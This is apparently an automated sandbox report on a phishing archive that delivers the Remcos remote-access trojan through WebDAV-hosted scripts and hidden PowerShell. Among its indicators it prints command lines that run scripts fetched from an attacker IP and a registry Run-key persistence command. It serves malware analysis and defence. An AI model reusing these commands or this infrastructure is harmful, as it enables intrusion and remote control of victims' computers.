File name:

SPAM.zip

Full analysis: https://app.any.run/tasks/0d097141-0041-4093-a950-20e9b8f0bb2f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: March 19, 2025, 11:33:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
arch-scr
webdav
loader
remcos
rat
remote
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

8D902EFF28BA6E36F51F3DE7EEBB4383

SHA1:

9879FA63A62EE8D1BF41DB5CF0A562D475701A32

SHA256:

2548275F19CF7FD2A9373AE5015B4041F0DA0485D2C26DA2A14EC0EB6F32F0A7

SSDEEP:

192:2M8WPAiwjpj7fK0Mo1Lyh/1UeBRxW4MclrRwP2FYU1a/Am:2P4IAreGh/13BRgh/h

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 7576)

    • WebDav connection (SURICATA)

      • explorer.exe (PID: 5492)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7200)

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)

    • Changes the autorun value in the registry

      • reg.exe (PID: 4284)

    • REMCOS mutex has been found

      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)

    • REMCOS has been detected (SURICATA)

      • powershell.exe (PID: 6708)

  • SUSPICIOUS

    • SMB connection has been detected (probably for file transfer)

      • explorer.exe (PID: 5492)

    • Connects to unusual port

      • svchost.exe (PID: 2320)
      • explorer.exe (PID: 5492)
      • powershell.exe (PID: 6708)

    • The process executes JS scripts

      • explorer.exe (PID: 5492)

    • Executing commands from ".cmd" file

      • wscript.exe (PID: 780)
      • wscript.exe (PID: 1452)
      • wscript.exe (PID: 4920)
      • wscript.exe (PID: 7820)
      • explorer.exe (PID: 5492)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1672)
      • cmd.exe (PID: 6700)
      • cmd.exe (PID: 7696)
      • cmd.exe (PID: 6656)
      • cmd.exe (PID: 2908)
      • explorer.exe (PID: 5492)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 780)
      • wscript.exe (PID: 4920)
      • wscript.exe (PID: 1452)
      • wscript.exe (PID: 7820)

    • Potential Corporate Privacy Violation

      • explorer.exe (PID: 5492)

    • Uses pipe srvsvc via SMB (transferring data)

      • explorer.exe (PID: 5492)

    • Abuses WebDav for code execution

      • svchost.exe (PID: 2320)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 1452)
      • wscript.exe (PID: 4920)
      • wscript.exe (PID: 7820)
      • explorer.exe (PID: 5492)
      • wscript.exe (PID: 780)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7284)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 7284)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7364)

    • Uses RUNDLL32.EXE to load library

      • svchost.exe (PID: 2320)

    • The process downloads a VBScript from the remote host

      • explorer.exe (PID: 5492)

    • Process requests binary or script from the Internet

      • svchost.exe (PID: 2320)

    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)

    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 6980)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7200)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7284)

    • Creates file in the systems drive root

      • explorer.exe (PID: 5492)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 7832)
      • cmd.exe (PID: 7836)
      • cmd.exe (PID: 8060)
      • cmd.exe (PID: 1240)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 6708)

  • INFO

    • Creates or changes the value of an item property via Powershell

      • cmd.exe (PID: 1672)
      • cmd.exe (PID: 6700)
      • cmd.exe (PID: 7696)
      • cmd.exe (PID: 6656)
      • cmd.exe (PID: 2908)
      • explorer.exe (PID: 5492)

    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 5492)

    • Creates files or folders in the user directory

      • explorer.exe (PID: 5492)
      • BackgroundTransferHost.exe (PID: 7508)

    • Reads Microsoft Office registry keys

      • explorer.exe (PID: 5492)

    • Disables trace logs

      • powershell.exe (PID: 7200)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 7284)

    • Checks proxy server information

      • powershell.exe (PID: 7200)
      • explorer.exe (PID: 5492)
      • powershell.exe (PID: 6708)
      • slui.exe (PID: 8148)
      • powershell.exe (PID: 7284)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 7364)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 7364)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7364)

    • Autorun file from Registry key

      • reg.exe (PID: 4284)

    • Reads the software policy settings

      • slui.exe (PID: 8148)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2025:03:19 12:31:16
ZipCRC: 0xe2209060
ZipCompressedSize: 2574
ZipUncompressedSize: 4239
ZipFileName: a.cmd
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
195
Monitored processes
53
Malicious processes
18
Suspicious processes
3

Behavior graph

Click at the process to see the details
start winrar.exe no specs slui.exe explorer.exe svchost.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs #REMCOS powershell.exe conhost.exe no specs #REMCOS powershell.exe conhost.exe no specs #REMCOS powershell.exe conhost.exe no specs #REMCOS powershell.exe conhost.exe no specs backgroundtransferhost.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs reg.exe reg.exe no specs reg.exe no specs reg.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
780"C:\Windows\System32\WScript.exe" "\\196.251.80.250@16309\Docs\Open - Bonida Unterlagen Schweiz.js" C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
924\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1088"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
1240"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Draftee" /t REG_EXPAND_SZ /d "%Preprocessorernes% -windowstyle 1 $Overgreb=(gi 'HKCU:\Software\Invocational\').GetValue('Bepicture');%Preprocessorernes% ($Overgreb)"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
1452"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\js3.js" C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1672"C:\Windows\System32\cmd.exe" /c\\196.251.80.250@16309\Docs\a.cmdC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2320C:\WINDOWS\system32\svchost.exe -k LocalService -p -s WebClientC:\Windows\System32\svchost.exe
services.exe
User:
LOCAL SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2332\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2664\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2772\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
63 829
Read events
63 705
Write events
115
Delete events
9

Modification events

(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconLayouts
Value:
00000000000000000000000000000000030001000100010011000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C0000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C0000000D0000000000000053006B007900700065002E006C006E006B003E0020007C000000100000000000000063006F006400650072006F006C0065002E007200740066003E00200020000000100000000000000067006D007400640061007600690064002E007200740066003E0020002000000011000000000000006900730073007500650073006400650063002E0070006E0067003E0020002000000016000000000000006900730073007500650073006400690072006500630074006C0079002E006A00700067003E0020002000000010000000000000006C0069006E006B0073006500740063002E0070006E0067003E0020002000000013000000000000006D0061006300680069006E006500610072006D0079002E006A00700067003E0020002000000013000000000000006D0061006E00750061006C006400610069006C0079002E007200740066003E0020002000000010000000000000007600610065006E006F007500670068002E0070006E0067003E002000200000000C000000000000005300500041004D002E007A00690070003E00200020000000010000000000000002000100000000000000000001000000000000000200010000000000000000001100000006000000010000001100000000000000000000000000000000000000803F0000004008000000803F0000404009000000803F000080400A000000803F0000A0400B0000000040000000000C00000000400000803F0D0000000040000000400E0000000040000040400F00000000000000803F0100000000000000004002000000000000004040030000000000000080400400000000000000A04005000000803F0000000006000000803F0000803F070000000040000080401000
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconNameVersion
Value:
1
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
Operation:writeName:LastUpdate
Value:
86ABDA6700000000
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:writeName:CheckSetting
Value:
23004100430042006C006F00620000000000000000000000010000000000000000000000
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\5\ApplicationViewManagement\W32:000000000004034C
Operation:writeName:VirtualDesktop
Value:
1000000030304456BFA0DB55E4278845B426357D5B5F97B3
(PID) Process:(7576) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(7576) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(7576) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(7576) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\SPAM.zip
(PID) Process:(7576) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
Executable files
0
Suspicious files
33
Text files
22
Unknown types
0

Dropped files

PID
Process
Filename
Type
7576WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\js3.jsbinary
MD5:A51F2D8B904BFB155BA100E7D93F58CF
SHA256:D56D8B23142A16B842E9DEDDFF2281B9DB547033447229A35CDB5A236C1B6266
7576WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\Open - Bonida Unterlagen Schweiz.jsbinary
MD5:B66A01E8ADFFBA2C488DE10ED16F7289
SHA256:D829439CAD19CBD47F0FB4A0A4A1968F066D96AA5FC436EE177A2EFDF3EC797C
7576WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\js2.jsbinary
MD5:A58F429C19B5A7F37DBD9DC9DB593C3C
SHA256:54E422EC69BE5338827096295F18D68E63587944053E3D3AF65192AF929D289B
7576WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\a.cmdtext
MD5:6958CD7AE6FBB4074E49EEF0EE26762A
SHA256:7F1DDF0D05B256762152DF1EC03355C2ABABBC94B3E8D37BE4EE6E3C28AD9439
5492explorer.exeC:\Users\admin\Desktop\a.cmdtext
MD5:6958CD7AE6FBB4074E49EEF0EE26762A
SHA256:7F1DDF0D05B256762152DF1EC03355C2ABABBC94B3E8D37BE4EE6E3C28AD9439
5492explorer.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-msbinary
MD5:DCB0D8386EE8F2B02C6593877D2711D6
SHA256:C7652579F1976032B30E6A325ADFADF309603A060A9DB129C719ED8B6E609AC6
7576WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\Cristian Rus documente Elvetia.pdf.lnk.downloadbinary
MD5:876D54A0F4878A6557E9E08A0D365A1C
SHA256:92DE472B6DFAD0781EF198D4AF2538ED2D87FBF327858D9C27BA880D4D6C162C
5492explorer.exeC:\Users\admin\Desktop\Cristian Rus documente Elvetia.pdf.lnkbinary
MD5:876D54A0F4878A6557E9E08A0D365A1C
SHA256:92DE472B6DFAD0781EF198D4AF2538ED2D87FBF327858D9C27BA880D4D6C162C
2320svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{EAE36E11-A821-4F43-AA37-E8C7E9359648}.jsbinary
MD5:B66A01E8ADFFBA2C488DE10ED16F7289
SHA256:D829439CAD19CBD47F0FB4A0A4A1968F066D96AA5FC436EE177A2EFDF3EC797C
4408powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9RB9AH1QUMOFHCF7TSPK.tempbinary
MD5:CC9A85DD11A8B535ED073B583B054457
SHA256:9BA771B1278130BBC3D532AC8D4E5A24680C687EA60EE6D66A4C71D3E89FCF26
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
55
TCP/UDP connections
73
DNS requests
21
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5492
explorer.exe
OPTIONS
200
196.251.80.250:16309
http://196.251.80.250:16309/
unknown
unknown
2320
svchost.exe
OPTIONS
200
196.251.80.250:16309
http://196.251.80.250:16309/Docs/
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs/
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs/Open%20-%20Bonida%20Unterlagen%20Schweiz.js
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs/a.cmd
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs/a.cmd
unknown
unknown
2320
svchost.exe
GET
200
196.251.80.250:16309
http://196.251.80.250:16309/Docs/Open%20-%20Bonida%20Unterlagen%20Schweiz.js
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5556
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2112
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7432
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5492
explorer.exe
196.251.80.250:16309
SC
unknown
2320
svchost.exe
196.251.80.250:16309
SC
unknown
7200
powershell.exe
217.160.0.213:443
www.support-data.com
IONOS SE
DE
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 172.217.16.142
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
www.support-data.com
  • 217.160.0.213
unknown
client.wns.windows.com
  • 40.113.103.199
whitelisted
login.live.com
  • 20.190.159.68
  • 40.126.31.0
  • 40.126.31.128
  • 20.190.159.75
  • 40.126.31.130
  • 20.190.159.64
  • 40.126.31.67
  • 20.190.159.128
  • 40.126.32.136
  • 40.126.32.133
  • 20.190.160.128
  • 40.126.32.72
  • 20.190.160.130
  • 20.190.160.66
  • 20.190.160.67
  • 40.126.32.140
whitelisted
arc.msn.com
  • 20.199.58.43
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
  • 23.48.23.166
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted

Threats

PID
Process
Class
Message
5492
explorer.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] WebDav activity has been detected
5492
explorer.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 38
2320
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
2320
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
2320
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
2320
svchost.exe
Potentially Bad Traffic
ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1
6708
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 38
6708
powershell.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
6708
powershell.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
6708
powershell.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
SPAM.zip